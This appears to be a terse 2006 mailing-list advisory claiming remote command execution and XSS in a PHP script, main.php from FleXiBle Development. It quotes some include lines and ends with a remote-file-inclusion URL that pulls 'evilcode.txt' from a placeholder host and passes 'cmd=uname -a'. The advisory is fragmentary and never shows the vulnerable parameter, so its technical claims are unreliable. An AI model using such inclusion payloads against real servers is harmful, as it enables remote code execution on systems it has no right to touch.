Date: 1 Apr 2006 19:15:14 -0000
From: [email protected]
To: [email protected]Subject: FleXiBle Development Script Remote Command Exucetion And XSS
Attacking
X-Virus-Scanned: antivirus-gw at tyumen.ru
Description :
/* =================================================
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: [email protected]
File: main.php
Version: 3.0
Date started: 10th May, 2004
Last modified : 24th January, 2006
Last Update: New layout
Vulnerable
ob_start(ob_gzhandler);
//Defining some functions and including them
require('php/messages.php');
//require base-file
//require_once('php/base.php');
include_once "baseconfig.inc.php";
http://www.site.com/[path]/evilcode.txt?&cmd=uname -a
